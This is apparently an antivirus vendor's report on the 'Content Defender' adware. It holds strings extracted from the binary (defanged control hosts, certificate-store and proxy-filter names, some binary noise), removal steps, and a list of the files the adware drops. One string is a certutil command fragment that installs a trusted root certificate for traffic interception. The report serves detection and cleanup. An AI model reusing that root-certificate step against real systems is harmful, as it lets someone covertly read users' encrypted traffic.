hXXp://contentdefender-cis4.org
hXXp://contentdefender-cis5.org
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%u.%u
successurl
hXXp://contentdefender-cis1.org/data/get/
hXXp://contentdefender-cis1.org/error/index/
contentdefender-cis1.org
contentdefenderdrv.sys
hXXp://contentdefender-cis1.org/version/checknew/
%s open failed, code %u
Domain filtering: %s Words filtering: %s
%u badwords detected
Opening of words key failed
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
\\.\CtrlSM
system32\drivers\%s.sys
SYSTEM\CurrentControlSet\Services\%s
Tcpip
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Wtsapi32.dll
SSL\SSLDataProvider.cpp
critical,keyCertSign,cRLSign
%s-%s#ss
%s-%s-%s#child
1.3.6.1.5.5.7.3.1
1.3.6.1.4.1.311.10.3.3
2.16.840.1.113730.4.1
127.0.0.1
HTTP/1.
http/1.
PORT
504 Unsupported transfer mode
504 Unsupported command
PORT
%s.%s.%s.%s:%d
%s:%s
[%s]:%s
File-Count: %d
Total-Bytes: %d
File-Name: %s
{0946134E-4C7F-11D1-8222-444553540000}
C:\prg\ContentDefender\Release\ContentDefender.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
ReportEventA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
InternetCanonicalizeUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
PSAPI.DLL
VERSION.dll
CertOpenStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertFreeCertificateContext
CertDeleteCertificateFromStore
CertEnumSystemStore
CertGetNameStringA
CertCreateContext
CRYPT32.dll
WS2_32.dll
SSLEAY32.dll
LIBEAY32.dll
GetCPInfo
CertAddEncodedCertificateToStore
CertGetCertificateChain
CertVerifyCertificateChainPolicy
CertFreeCertificateChain
CertOpenSystemStoreA
CertFindCertificateInStore
CertAddCertificateContextToStore
PFXExportCertStoreEx
zcÁ
.?AV?$CAtlExeModuleT@VCContentDefenderModule@@@ATL@@
.?AVHttpFilter@@
.?AVCUrlChecker@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
200075929
%Program Files%\Content Defender\ContentDefender.exe
ForceRemove {9B7395C3-28B5-445E-AA7D-539B63514CAB} = s 'DefenderControl Class'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}'
&iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:3B9314F8140A11E5B8C2F69F2352A95D" xmpMM:DocumentID="xmp.did:3B9314F9140A11E5B8C2F69F2352A95D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3B9314F6140A11E5B8C2F69F2352A95D" stRef:documentID="xmp.did:3B9314F7140A11E5B8C2F69F2352A95D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:7B9A72D8140B11E589ACF650979FF142" xmpMM:DocumentID="xmp.did:7B9A72D9140B11E589ACF650979FF142"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7B9A72D6140B11E589ACF650979FF142" stRef:documentID="xmp.did:7B9A72D7140B11E589ACF650979FF142"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
stdole2.tlbWWW
Created by MIDL version 7.00.0555 at Wed Nov 11 21:55:10 2015
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS></application></compatibility></assembly>
>,?9?>?[?
: :):0:<:
0 0*00060<0
4 4M4x4
2-282m2}2
1%1*1/141=1
5 5$5(5,5054585<5@5
9 9$9(9,9
4 4$4(4,4044484
sOLEAUT32.DLL
B{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
combase.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\*.cer
\cert.db
\x.db
\xtls.db
\xv.db
nss\certutil -A -t "TCu" -i "
opcacrt6.dat
ca-certs
%Program Files%\Content Defender\cert
1.15.0.1
ContentDefender.exe
05a00036.exe_2040:
.text
`.data
.rsrc
@.Reloc
onex.dll
KERNEL32.dll
UXTHEME.dll
wtsapi32.dll
ctl3d32.dll
tyioptre.pdb
<assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="iusaraol" type="win32"/>
<requestedExecutionLevel level="requireAdministrator"/>
7%9S5!
bu0.JF
0Tv%U?
.g.kl
*%xO<
,x\,WeB
.jV>C
0&v%1S
.vTx;
z.aC/
8-.kC
%uJ0Mp
qs.Brf
M%s7.
Z.ey
q/4Ø
%s0qA
tEXE
#4.uQ
Sc.eYo
-yU2%dH
pHq7.Ns
s.nLz
&.HjB
-0%fsI
'0-_8.%.
rMsG
.DT)l
.yf'{
8D(.zAd~:
"/6"&3?|
pG.xc` V
ri%1S0
7=Y)crTT
.pSY>
j&%f%/
{2g.rBo
p-MPs}
c^.TW
>r.%D
kO.waT#
kN@ihX.DuE
6%Dj-
51&0%C
.nsKs
/o#2
-v}<&/|>
^ .gg
QFtP
.EnH}i
.OVqxg
Xx1%Di
.tRj6
p%XvF
9MT.rF
El.bR
OCmd
!Íh
c"3!.JnA
"%Dz!
.Ga-k
.rx|t
@%c!3!<
&%0/&5 0
.Eb*B
.vN{o
0r``%S
OjI%x
:%d#p
Î=~
y&%d|
&.OTE
|.vb9V
1|.le$
tMr.Gmk
K0%sF9
.GZKX
1FZ.fw
3T<%s}r
7t/%S
2/%Uk
6.ee&
'-'.yO
_'.Wk
.Tn@[
.FI;!
I.DX'
:3.xskCb:3/
U!3%uX
03!%F
%fv7I
SW.TF
M.UI>
(-2/#20
.ZfTh
LUdP
Ai4%C
?G\a/%X
.BX8n}
R.sMC
.ZWvp
.WLg]
.fNc>g
o%urxu
ez9%x
>%9syf(
REC.xQ
b-m}N
'.Vi^
l}'
.efpmR!'a
%D}41bu
F[''.Bf'.
'.oe>
1)M.AKU&!;>=5[G4
u.hGHZ0;JX?s
|T%Fu4EO5
M.DaYv
).EY
R%0ua
J%0s*
Ae/%S
Roc/%S
dskquoui.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
verclsid.exe:1312
sethome.exe:1364
ConDefSetup1211v2.exe:1984
ContentDefender.exe:304
ContentDefender.exe:1392 - Delete the original Adware file.
- Delete or disinfect the following files created/modified by the Adware:
%Documents and Settings%\%current user%\Local Settings\Temp\{D62137EE-087C-4894-BC4E-F3BCE698C253}\05a00036.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{64A3266F-F6B9-4654-B4E5-9A581A4F08C6}\sethome.exe (53851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B979352F-852D-4B26-8E59-8A238895D5EA}\ConDefSetup1211v2.exe (39950 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\IEXPLORE.bat (208 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\IÕÃÂ¥PLÞRÕ.bðt.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefender.exe (41388 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefender.exe (34724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefender.exe (5381 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefender.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefender.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%System%\drivers\contentdefenderdrv.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41020 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.